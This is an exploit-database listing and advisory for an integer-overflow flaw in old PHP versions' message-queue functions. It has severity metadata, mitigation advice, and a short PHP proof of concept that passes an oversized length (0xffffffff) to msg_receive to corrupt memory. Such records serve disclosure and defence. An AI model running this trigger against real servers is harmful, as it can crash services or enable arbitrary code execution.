Integer-Overflow Vulnerability in PHP

vendor:

PHP

by:

Unknown

7.5

CVSS

HIGH

Integer-Overflow

190

CWE

Product Name: PHP

Affected Version From: PHP versions prior to 4.4.5 and 5.2.1

Affected Version To: Unknown

Patch Exists: YES

Related CWE: Unknown

CPE: a:php:php

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Integer-Overflow Vulnerability in PHP

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory. Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

Mitigation:

Update PHP to version 4.4.5 or 5.2.1 or later. Additionally, ensure that integer values are properly validated and handled to prevent integer-overflow vulnerabilities.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23236/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects PHP versions prior to 4.4.5 and 5.2.1. 

<?php

  $MSGKEY = 519052;

  $msg_id = msg_get_queue ($MSGKEY, 0600);

  if (!msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
    echo "Msg not sent because $msg_err\n";

  if (msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
    echo "$msg\n";
  } else {
    echo "Received $msg_error fetching message\n";
    break;
  }

  msg_remove_queue ($msg_id);

?>